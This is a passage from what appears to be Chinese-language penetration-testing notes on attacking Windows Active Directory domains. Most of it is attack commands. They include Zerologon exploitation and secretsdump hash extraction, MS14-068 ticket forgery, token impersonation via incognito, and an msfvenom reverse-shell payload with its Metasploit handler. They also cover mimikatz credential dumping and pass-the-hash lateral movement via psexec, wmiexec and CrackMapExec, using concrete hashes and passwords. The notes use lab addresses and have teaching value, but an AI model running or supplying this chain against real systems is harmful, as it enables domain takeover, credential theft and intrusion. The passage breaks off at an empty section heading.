https:\/\/github.com\/dirkjanm\/CVE-2020-1472<\/a><\/p>\n \u7f6e\u7a7aDC\u7684\u5bc6\u7801 python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR<\/p>\n python3 cve-2020-1472-exploit.py ad01 10.10.10.137<\/p>\n \u83b7\u53d6HASH<\/p>\n \u4f7f\u7528impacket\u5305\u4e2d\u7684secretsdum.py\u6765\u83b7\u53d6\u76f8\u5173\u7684HASh<\/p>\n python3 secretsdump.py DOMAIN\/DC_NETBIOS_NAME$@DC_IP_ADDR -no-pass<\/p>\n python3 secretsdump.py redteam.club\/ad01$@10.10.10.137 -no-pass<\/p>\n \u83b7\u53d6shell<\/p>\n \u83b7\u53d6HASH\u540e\uff0c\u53ef\u4ee5\u5229\u7528wmiexec.py\u767b\u5f55\uff0c\u4ece\u800c\u83b7\u53d6\u4e00\u4e2aSHELL<\/p>\n \u6062\u590d\u539fHASH<\/p>\n \u5bfc\u51fasam<\/p>\n \u83b7\u53d6hash<\/p>\n \u6267\u884c\u4ee5\u4e0b\u547d\u4ee4\uff0c\u83b7\u53d6SAM\u4e2d\u539f\u6765\u7684HASH<\/p>\n server2008\u6709\u6548 MS14068\u662f\u4e00\u4e2a\u80fd\u591f\u4f7f\u666e\u901a\u7528\u6237\u63d0\u6743\u5230\u57df\u63a7\u6743\u9650\u7684\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u6784\u9020\u7279\u5b9a\u7684\u8bf7\u6c42\u5305\u6765\u8fbe\u5230\u63d0\u5347\u6743\u9650\u7684\u76ee\u7684\u3002<\/p>\n \u7b2c\u4e00\u6b65\uff1a\u5229\u7528MS14-068\u4f2a\u9020\u751f\u6210TGT<\/p>\n \u7b2c\u4e8c\u6b65\uff1a\u5229\u7528mimikatz\u5c06\u5de5\u5177\u5f97\u5230\u7684TGT\u7968\u636e\u5199\u5165\u5185\u5b58\uff0c\u521b\u5efa\u7f13\u5b58\u8bc1\u4e66<\/p>\n \u7b2c\u4e09\u6b65\uff1a\u83b7\u53d6\u57df\u7ba1\u7406\u5458\u6743\u9650\u3002\u521b\u5efa\u4e00\u4e2a test \u8d26\u53f7\u5e76\u52a0\u5165\u57df\u7ba1\u7406\u5458\u7ec4\uff0c\u4ece\u800c\u968f\u65f6\u53ef\u4ee5\u767b\u5f55\u57df\u63a7\u4e3b\u673a\u8fdb\u884c\u64cd\u4f5c<\/p>\n \u6216\u8005\u4f7f\u7528<\/p>\n \u5f53\u6709\u57df\u63a7\u8d26\u6237\u767b\u9646\u81f3\u670d\u52a1\u5668\u65f6\u53ef\u4f7f\u7528\u4ee4\u724c\u6a21\u62df\u8fdb\u884c\u6e17\u900f\u53d6\u5f97\u57df\u63a7\u6743\u9650\u3002<\/p>\n 1\u3001\u5165\u4fb5\u57df\u7ba1\u7406\u5458\u6240\u5728\u7684\u670d\u52a1\u5668\uff0c\u7a83\u53d6\u57df\u7ba1\u7406\u5458\u7684\u4ee4\u724c\uff0c\u4ece\u800c\u63a7\u5236\u6574\u4e2a\u57df\u3002<\/p>\n 2\u3001\u76f4\u63a5\u5728 meterpreter shell \u4e0a\u6267\u884c\u6dfb\u52a0\u57df\u7ba1\u7406\u5458<\/p>\n \u5165\u4fb5\u4e86\u57df\u7ba1\u7406\u5458\u6240\u767b\u5f55\u7684\u670d\u52a1\u5668\uff0c\u5c06\u8fdb\u7a0b\u8fc1\u79fb\u5230\u57df\u7ba1\u7406\u5458\u6240\u8fd0\u884c\u7684\u8fdb\u7a0b\uff0c\u5c31\u53ef\u4ee5\u83b7\u5f97\u57df\u7ba1\u7406\u5458\u6743\u9650\u3002<\/p>\n 1\u3001\u83b7\u53d6\u57df\u7ba1\u7406\u5458\u5217\u8868<\/p>\n 2\u3001\u5229\u7528ps\u627e\u5230\u57df\u7ba1\u7406\u5458\uff08TESTbypass\uff09\u6240\u8fd0\u884c\u7684\u8fdb\u7a0b\uff0c\u7136\u540e\u5c06shell\u8fdb\u7a0b\u8fc1\u79fb\u5230\u57df\u7ba1\u7406\u5458\u6240\u8fd0\u884c\u7684\u8fdb\u7a0b\u4e2d\uff0c\u6210\u529f\u540e\u5c31\u83b7\u5f97\u4e86\u57df\u7ba1\u7406\u5458\u6743\u9650\u3002\u5982\u4e0b\u56fe\u6240\u793a\uff1a<\/p>\n 3\u3001\u8f93\u5165shell\u547d\u4ee4\u83b7\u53d6OS shell\uff0c\u5728\u672c\u673a\u4e0a\u4f7f\u7528Windows\u547d\u4ee4\u6dfb\u52a0\u65b0\u7684\u57df\u7ba1\u7406\u5458\uff1a<\/p>\n \u66f4\u65b0: 2025-05-08 14:37:35![\"1746669708803-c15faf0c-1b6a-4f4b-892d-e72e11d6973b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0f49ec1a.png\")
<\/p>\n![\"1746669721635-50a6ee9e-9f14-44bd-9953-26ef4e837a95.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0f761f8e.png\")
<\/p>\n\u57df\u540d\u670d\u52a1\u5668 DNS<\/h2>\n
\u57df\u672f\u8bed<\/h2>\n
\n
\u642d\u5efa\u57df\u63a7<\/h2>\n
![\"1746670038479-bb3f563f-7f12-40b5-a1a5-95dca08650ea.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0fa614ef.png\")
<\/p>\n![\"1746670100985-bc4ace8f-9b4a-4237-a9bd-a31e7054626b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae0fe732ac.png\")
<\/p>\n![\"1746670110075-b26912a9-4183-43ae-9fda-43d7dc8a97f1.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae103354f2.png\")
<\/p>\n![\"1746670114996-a28496d8-6244-45a2-b68d-5c716d5237d6.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1073533c.png\")
<\/p>\n![\"1746670126030-a4acdefc-b719-43d8-bbf5-bab69c660fa5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae10fb3a05.png\")
<\/p>\n![\"1746670131027-98bda9b1-80af-4b6d-a353-ac6a42a14001.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae112c368d.png\")
<\/p>\n![\"1746670135965-a6a15f44-3c7a-490b-96c6-6488e0937025.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae11571814.png\")
<\/p>\n![\"1746670280396-ff72fbc0-1d27-4473-8a34-812dd9804a66.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae11807aa3.png\")
<\/p>\n![\"1746670286767-aae725a2-5ea4-455b-a67f-ed494e6479cb.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae11ad6a4b.png\")
<\/p>\n![\"1746670296452-edbe4b37-9910-4110-9052-553c3bb6dc72.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae11d31d9a.png\")
<\/p>\n![\"1746670303747-8b25df12-bc4b-40c0-9642-6694a4d2b5c0.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae11f558e3.png\")
<\/p>\n![\"1746670313927-34e1b066-752f-4a0a-aa0e-23b4430908e3.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae121c48f2.png\")
<\/p>\n![\"1746670318494-637f89dd-ed9c-4802-9f4b-8d7065621e76.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae12480825.png\")
<\/p>\n![\"1746670326017-dc605fe5-436a-4e66-871b-8cd7a65362b0.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae12785064.png\")
<\/p>\n![\"1746670333268-b9be2b83-9317-49dd-9e4a-f7ee375c48be.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae12a8a305.png\")
<\/p>\n\u8ba1\u7b97\u673a\u52a0\u5165\u57df<\/h3>\n
![\"1746670371918-009961d2-ff64-4808-beec-ca7ba7f962fd.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae12da7a3f.png\")
<\/p>\n![\"1746670382696-1b371262-da08-4084-98ed-8770ace50dbe.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1310a5bc.png\")
<\/p>\n![\"1746670393751-a1b2a1f0-6d32-4970-a068-f10df29543d1.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae133c6265.png\")
<\/p>\n![\"1746670403335-10582e56-edc1-4339-a106-a19d09c03211.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae136f29c2.png\")
<\/p>\n![\"1746670409533-4fed964d-89d7-4836-8596-23f9565a3762.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae13cd5b80.png\")
<\/p>\n![\"1746670420525-a686986a-3208-4435-8e2c-917a3f3f2468.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae13fa427a.png\")
<\/p>\n![\"1746670425391-48728e40-77d3-41fa-830a-35e0fa2e6386.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae14254a79.png\")
<\/p>\n\u57df\u4fe1\u606f\u6536\u96c6\u547d\u4ee4<\/h1>\n
query user || qwinsta \u67e5\u770b\u5f53\u524d\u5728\u7ebf\u7528\u6237\nnet user \u67e5\u770b\u672c\u673a\u7528\u6237\nnet user \/domain \u67e5\u770b\u57df\u7528\u6237\nnet view & net group \"domain computers\" \/domain \u67e5\u770b\u5f53\u524d\u57df\u8ba1\u7b97\u673a\u5217\u8868 \u7b2c\u4e8c\n\u4e2a\u67e5\u7684\u66f4\u591a\nnet view \/domain \u67e5\u770b\u6709\u51e0\u4e2a\u57df\nnet view \\\\dc \u67e5\u770b dc \u57df\u5185\u5171\u4eab\u6587\u4ef6\nnet group \/domain \u67e5\u770b\u57df\u91cc\u9762\u7684\u7ec4\nnet group \"domain admins\" \/domain \u67e5\u770b\u57df\u7ba1\nnet localgroup administrators \/domain \/\u8fd9\u4e2a\u4e5f\u662f\u67e5\u57df\u7ba1\uff0c\u662f\u5347\u7ea7\u4e3a\u57df\u63a7\u65f6\uff0c\n\u672c\u5730\u8d26\u6237\u4e5f\u6210\u4e3a\u57df\u7ba1\nnet group \"domain controllers\" \/domain \u57df\u63a7\nnet time \/domain\nnet config workstation \u5f53\u524d\u767b\u5f55\u57df - \u8ba1\u7b97\u673a\u540d - \u7528\u6237\u540d\nnet use \\\\\u57df\u63a7(\u5982 pc.xx.com) password \/user:xxx.comusername \u76f8\u5f53\u4e8e\u8fd9\u4e2a\n\u5e10\u53f7\u767b\u5f55\u57df\u5185\u4e3b\u673a\uff0c\u53ef\u8bbf\u95ee\u8d44\u6e90\nipconfig\nsysteminfo\ntasklist \/svc\ntasklist \/S ip \/U domainusername \/P \/V \u67e5\u770b\u8fdc\u7a0b\u8ba1\u7b97\u673a tasklist\nnet localgroup administrators && whoami \u67e5\u770b\u5f53\u524d\u662f\u4e0d\u662f\u5c5e\u4e8e\u7ba1\u7406\u7ec4\nnetstat -ano\nnltest \/dclist:xx \u67e5\u770b\u57df\u63a7\nwhoami \/all \u67e5\u770b Mandatory Label uac \u7ea7\u522b\u548c sid \u53f7\nnet sessoin \u67e5\u770b\u8fdc\u7a0b\u8fde\u63a5 session (\u9700\u8981\u7ba1\u7406\u6743\u9650)\nnet share \u5171\u4eab\u76ee\u5f55\ncmdkey \/l \u67e5\u770b\u4fdd\u5b58\u767b\u9646\u51ed\u8bc1\necho %logonserver% \u67e5\u770b\u767b\u9646\u57df\nspn \u2013l administrator spn \u8bb0\u5f55\nset \u73af\u5883\u53d8\u91cf\ndsquery server - \u67e5\u627e\u76ee\u5f55\u4e2d\u7684 AD DC\/LDS \u5b9e\u4f8b\ndsquery user - \u67e5\u627e\u76ee\u5f55\u4e2d\u7684\u7528\u6237\ndsquery computer \u67e5\u8be2\u6240\u6709\u8ba1\u7b97\u673a\u540d\u79f0 windows 2003\ndir \/s *.exe \u67e5\u627e\u6307\u5b9a\u76ee\u5f55\u4e0b\u53ca\u5b50\u76ee\u5f55\u4e0b\u6ca1\u9690\u85cf\u6587\u4ef6\narp -a<\/code><\/pre>\n![\"1746670473749-883425c7-7b91-4ba7-b7d9-a13ed772cc1f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1457a8d2.png\")
<\/p>\n![\"1746670483009-dd60133f-e904-4e79-9096-e93d6024db6b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae148d7cf2.png\")
<\/p>\n![\"1746670492894-7a4667a0-eea7-45ad-aa07-640b98b0f556.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae14b9707f.png\")
<\/p>\n![\"1746670501777-b3ee0878-f254-44ef-bf09-022cb79f3830.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae14e2865b.png\")
<\/p>\n![\"1746670515221-2c2cbde3-1103-4589-90dc-29906b54309d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae150edf88.png\")
<\/p>\n![\"1746670524973-a2939d2e-40ad-4b8a-8826-490b9a87db38.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae153534bc.png\")
<\/p>\n\u67e5\u627e\u57df\u670d\u52a1\u5668<\/h2>\n
![\"1746670547427-bfec239d-cc19-40a4-a632-099567a4b0cc.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae155795ed.png\")
<\/p>\n![\"1746670556493-6525a358-5ce0-428b-91ed-fdd4d3d0654e.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae157edf6b.png\")
<\/p>\n![\"1746670564401-5a1fb584-f822-458f-9eba-0b007e113f3b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae15a9c93f.png\")
<\/p>\nping\/nslookup \u67e5\u627e\u57df\u63a7<\/h2>\n
![\"1746670581509-962bca1b-e412-44ff-8a36-79fb1bc6bd5c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae15d8be21.png\")
<\/p>\n![\"1746670592961-13a55e9a-bf88-4d81-a30b-4f276aeabe83.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae15fd7c8b.png\")
<\/p>\n\u4e3b\u673a\u53d1\u73b0<\/h2>\n
![\"1746670612014-ada13c07-55cd-4601-9e91-329b88b32d02.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae161c0338.png\")
<\/p>\n![\"1746670625954-95962ce0-fa56-49f1-aa1a-3eba0ef00937.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1640bca8.png\")
<\/p>\n![\"1746670634520-a5f160db-fa12-4943-8f42-9251ddc9ef23.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae166628cb.png\")
<\/p>\n![\"1746670645328-28d992ca-bfde-47f9-b0ec-24e25631d7d8.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1692da60.png\")
<\/p>\n![\"1746670654289-bb9632ac-c9db-4261-8b04-134d27342e21.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae16bccf0f.png\")
<\/p>\npowershell.exe -exec bypass -Command \"Import-Module .\/Invoke-TSPingSwee\np.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.\n1.255\"<\/code><\/pre>\nPS C:UsersBypass> 1..1024 | % {echo ((new-object Net.Sockets.TcpClien\nt).Connect(\"192.168.246.44\",$_)) \"Port $_ is open!\"} 2>$null<\/code><\/pre>\nforeach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel \"\nDetailed\" 192.168.1.$ip}<\/code><\/pre>\n1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClie\nnt).Connect(\"10.0.0.$a\",$_)) \"Port $_ is open!\"} 2>$null}<\/code><\/pre>\n\u57fa\u4e8e MSF \u7684\u5185\u7f51\u4e3b\u673a\u63a2\u6d4b<\/h2>\n
auxiliary\/scanner\/discovery\/arp_sweep ARP \u626b\u63cf\nauxiliary\/scanner\/discovery\/udp_sweep UDP \u626b\u63cf\nauxiliary\/scanner\/netbios\/nbname NETBIOS \u626b\u63cf\nauxiliary\/scanner\/snmp\/snmp_enum SNMP \u626b\u63cf\nauxiliary\/scanner\/smb\/smb_version SMB \u626b\u63cf<\/code><\/pre>\nauxiliary\/scanner\/portscan\/ack TCP ACK \u7aef\u53e3\u626b\u63cf\nauxiliary\/scanner\/portscan\/ftpbounce FTP bounce \u7aef\u53e3\u626b\u63cf\nauxiliary\/scanner\/portscan\/syn SYN \u7aef\u53e3\u626b\u63cf\nauxiliary\/scanner\/portscan\/tcp TCP \u7aef\u53e3\u626b\u63cf\nauxiliary\/scanner\/portscan\/xmas TCP XMas \u7aef\u53e3\u626b\u63cf<\/code><\/pre>\n-sT: TCP \u626b\u63cf\n-sS: SYN \u626b\u63cf\n-sA: ACK \u626b\u63cf\n-sF\uff1aFIN \u626b\u63cf\n-sU: UDP \u626b\u63cf\n-sR: RPC \u626b\u63cf\n-sP: ICMP \u626b\u63cf<\/code><\/pre>\nnmap -sS -p 1-65535 -v 192.168.99.177<\/code><\/pre>\n\u5e38\u89c1\u7aef\u53e3\u4e0e\u670d\u52a1<\/h2>\n
\u7aef\u53e3\u53f7 \u7aef\u53e3\u8bf4\u660e \u653b\u51fb\u6280\u5de7\n21\/22\/69 ftp\/tftp\uff1a\u6587\u4ef6\u4f20\u8f93\u534f\u8bae\u7206\u7834\u55c5\u63a2\u6ea2\u51fa\u540e\u95e8\n22 ssh\uff1a\u8fdc\u7a0b\u8fde\u63a5 \u7206\u7834 OpenSSH\uff1b28 \u4e2a\u9000\u683c\n23 telnet\uff1a\u8fdc\u7a0b\u8fde\u63a5 \u7206\u7834\u55c5\u63a2\n25 smtp\uff1a\u90ae\u4ef6\u670d\u52a1 \u90ae\u4ef6\u4f2a\u9020\n53 DNS\uff1a\u57df\u540d\u7cfb\u7edf DNS \u533a\u57df\u4f20\u8f93DNS \u52ab\u6301DNS \u7f13\u5b58\u6295\u6bd2DNS\u6b3a\u9a97\u5229\u7528 DNS \u96a7\u9053\u6280\u672f\u523a\u900f\u9632\u706b\u5899\n67\/68 dhcp \u52ab\u6301\u6b3a\u9a97\n110 pop3 \u7206\u7834\n139 samba \u7206\u7834\u672a\u6388\u6743\u8bbf\u95ee\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\n143 imap \u7206\u7834\n161 snmp \u7206\u7834\n389 ldap \u6ce8\u5165\u653b\u51fb\u672a\u6388\u6743\u8bbf\u95ee\n445 SMB \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\n512\/513\/514 linux r \u76f4\u63a5\u4f7f\u7528 rlogin\n873 rsync \u672a\u6388\u6743\u8bbf\u95ee\n1080 socket \u7206\u7834\uff1a\u8fdb\u884c\u5185\u7f51\u6e17\u900f\n1352 lotus \u7206\u7834\uff1a\u5f31\u53e3\u4ee4\u4fe1\u606f\u6cc4\u6f0f\uff1a\u6e90\u4ee3\u7801\n1433 mssql \u7206\u7834\uff1a\u4f7f\u7528\u7cfb\u7edf\u7528\u6237\u767b\u5f55\u6ce8\u5165\u653b\u51fb\n1521 oracle \u7206\u7834\uff1aTNS\u6ce8\u5165\u653b\u51fb\n2049 nfs \u914d\u7f6e\u4e0d\u5f53\n2181 zookeeper \u672a\u6388\u6743\u8bbf\u95ee\n3306 mysql \u7206\u7834\u62d2\u7edd\u670d\u52a1\u6ce8\u5165\n3389 rdp \u7206\u7834Shift \u540e\u95e8\n4848 glassfish \u7206\u7834\uff1a\u63a7\u5236\u53f0\u5f31\u53e3\u4ee4\u8ba4\u8bc1\u7ed5\u8fc7\n5000 sybase\/DB2 \u7206\u7834\u6ce8\u5165\n5432 postgresql \u7f13\u51b2\u533a\u6ea2\u51fa\u6ce8\u5165\u653b\u51fb\u7206\u7834\uff1a\u5f31\u53e3\u4ee4\n5632 pcanywhere \u62d2\u7edd\u670d\u52a1\u4ee3\u7801\u6267\u884c\n5900 vnc \u7206\u7834\uff1a\u5f31\u53e3\u4ee4\u8ba4\u8bc1\u7ed5\u8fc7\n6379 redis \u672a\u6388\u6743\u8bbf\u95ee\u7206\u7834\uff1a\u5f31\u53e3\u4ee4\n7001 weblogic Java \u53cd\u5e8f\u5217\u5316\u63a7\u5236\u53f0\u5f31\u53e3\u4ee4\u63a7\u5236\u53f0\u90e8\u7f72webshell\n80\/443\/8080 web \u5e38\u89c1 web \u653b\u51fb\u63a7\u5236\u53f0\u7206\u7834\u5bf9\u5e94\u670d\u52a1\u5668\u7248\u672c\u6f0f\u6d1e\n8069 zabbix \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\n9080 websphere \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\n9090 websphere \u63a7\u5236\u53f0 \u7206\u7834\uff1a\u63a7\u5236\u53f0\u5f31\u53e3\u4ee4Java \u53cd\u5e8f\u5217\n9200\/9300 elasticsearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\n11211 memcacache \u672a\u6388\u6743\u8bbf\u95ee\n27017 mongodb \u7206\u7834\u672a\u6388\u6743\u8bbf\u95ee<\/code><\/pre>\n\u57df\u6e17\u900f\u601d\u8def<\/h1>\n
\u5185\u7f51\u6e17\u900f Token<\/h1>\n
AccessToken \u7684\u7a83\u53d6\u4e0e\u5229\u7528<\/h2>\n
incognito<\/h3>\n
![\"1746671109840-6b777880-7fb4-4999-ab6b-4e82e092bd80.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae16e848bb.png\")
<\/p>\n![\"1746671124930-5e6c6c52-55ab-4467-a29d-75e21ac3a4ba.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae171d24cd.png\")
<\/p>\nMSF \u4e0b\u7684 incognito \u6a21\u5757<\/h3>\n
msf \u4ee4\u724c\u5b9e\u6218<\/h3>\n
msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LPORT=6666 LHOST=192.1\n68.0.115 -f exe -o msf.exe<\/code><\/pre>\nmsfconsole\nuse exploit\/multi\/handler\nset payload windows\/x64\/meterpreter\/reverse_tcp\nset lhost 192.168.0.115\nset lport 6666\nexploit<\/code><\/pre>\n![\"1746671169090-ac607647-b04b-4ad6-adfb-b9b277a67779.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae174f3fff.png\")
<\/p>\nuse incognito #\u8fdb\u5165 incognito \u6a21\u5757\nlist_tokens -u #\u5217\u51fa\u4ee4\u724c<\/code><\/pre>\nmpersonate_token 12SERVER-01Administrator #\u5047\u5192 12server-01adminst\nrator \u7684\u4ee4\u724c\nimpersonate_token moonsec\\test #\u5047\u5192 moonsectest\n\u7684\u4ee4\u724c\nimpersonate_token \"NT AUTHORITYSYSTEM\" #\u5047\u5192 System \u7684\u4ee4\u724c<\/code><\/pre>\n![\"1746671199539-addeff2d-3ba7-48af-aaa5-fccaf94b4c7b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae17857f6a.png\")
<\/p>\n![\"1746671214284-3ffb0f5e-2bb3-4911-95be-3a0413736008.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae17c11d0f.png\")
<\/p>\n![\"1746671225529-5aca21b3-1fdb-430e-bf63-f15610b0f50d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae17fea625.png\")
<\/p>\n![\"1746671236707-6322147d-d2d3-4b6f-9ddb-5de8d63a3a8a.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1823f140.png\")
<\/p>\n\u6a2a\u5411\u6e17\u900f<\/h1>\n
PTH(pass-the-hash) HASH \u4f20\u9012<\/h2>\n
mimitkaz pth<\/h3>\n
privilege::debug\nsekurlsa::logonpasswords\nmimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"> password.txt<\/code><\/pre>\n![\"1746671469636-c1529008-1509-4785-b395-4d73fd21b509.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae184ab849.png\")
<\/p>\nprivilege::debug\nsekurlsa::pth \/user:administrator \/domain:workgroup \/ntlm:32ed87bdb5fdc5e9cba88547376818d4<\/code><\/pre>\n![\"1746671488250-519e37a1-5d53-46a6-9db6-1c76ff4ee63e.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae187e43d4.png\")
<\/p>\npsexec<\/h3>\n
PsExec64.exe \/accepteula \/s \\192.168.0.123 -u Administrator -p 123456 cmd<\/code><\/pre>\nPsExec.exe \/accepteula \/s \\192.168.0.141 -u Administrator -p 123456 cmd \/c \"ipconfig\"<\/code><\/pre>\n![\"1746671575274-00239098-3f58-4f7f-879c-1300cff0a17b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae18ab96e8.png\")
<\/p>\n![\"1746671580530-96550781-504e-46e5-a773-4647e443ebfd.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae18d4f6cd.png\")
<\/p>\n![\"1746671585586-0ea5838b-1d90-4a2e-8b2f-72b7c4d912db.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae18f86f92.png\")
<\/p>\n![\"1746671602303-084695d4-3423-4c76-bd95-7ec5b5657022.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1921f68e.png\")
<\/p>\npython3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 .\/Administrator@192.168.0.123<\/code><\/pre>\n![\"1746671625745-a21486b2-1ea9-4f1e-aac3-c7dbd96ab5a0.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae19444453.png\")
<\/p>\n\u4f7f\u7528 msf hash \u6a21\u5757<\/h3>\n
use exploit\/windows\/smb\/psexec\nset SMBUser Administrator\nset rhosts 192.168.0.141\nset smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4<\/code><\/pre>\n![\"1746671666503-771b1022-5f93-46bd-adc6-3cb0ec8aa443.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae19725da8.png\")
<\/p>\nCrackMapExec<\/h3>\n
crackmapexec smb 192.168.0.0\/24 -u administrator -H 32ed87bdb5fdc5e9cba88547376818d4<\/code><\/pre>\n![\"1746671695778-b01499dc-1a78-4ff0-835f-87116789b6ee.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae19a75d48.png\")
<\/p>\nWMI<\/h3>\n
wmic \u547d\u4ee4<\/h3>\n
wmic \/node:192.168.0.123 \/user:administrator \/password:123456 process call create \"cmd.exe \/c ipconfig > c:ip.txt\"<\/code><\/pre>\n![\"1746671799055-7a44dadc-17a9-4061-aa52-2f9d6dca503f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae19d0a3d9.png\")
<\/p>\nnet use \\192.168.0.123ipc$ \"123456\" \/user:administrator \ntype \\192.168.0.123c$ip.txt<\/code><\/pre>\n![\"1746671824380-27212508-babd-4dad-85f3-74b0f21b8219.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae19f335aa.png\")
<\/p>\nwmiexec.py<\/h3>\n
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.0.141 \"whoami\"<\/code><\/pre>\n![\"1746671858456-ffeb5a6d-75de-4d08-a0b7-d89fec29f1e0.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1a15c114.png\")
<\/p>\npython3 wmiexec.py administrator:123456@192.168.0.123<\/code><\/pre>\n![\"1746671873620-25b468d8-99f0-4a62-9633-d580a579f74d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1a46d717.png\")
<\/p>\nwmiexec.vbs<\/h3>\n
cscript \/\/nologo wmiexec.vbs \/shell 192.168.0.123 administrator 123456<\/code><\/pre>\n![\"1746671898166-7b58672c-9986-4ed0-8b65-b525ee85c173.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1a8471ba.png\")
<\/p>\ncscript wmiexec.vbs \/cmd 192.168.0.123 administrator 123456 \"ipconfig\"<\/code><\/pre>\n![\"1746671914732-d4b734aa-8b87-4a39-b1b5-80ffc7a4d769.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1ab134de.png\")
<\/p>\nInvoke-WmiCommand<\/h3>\n
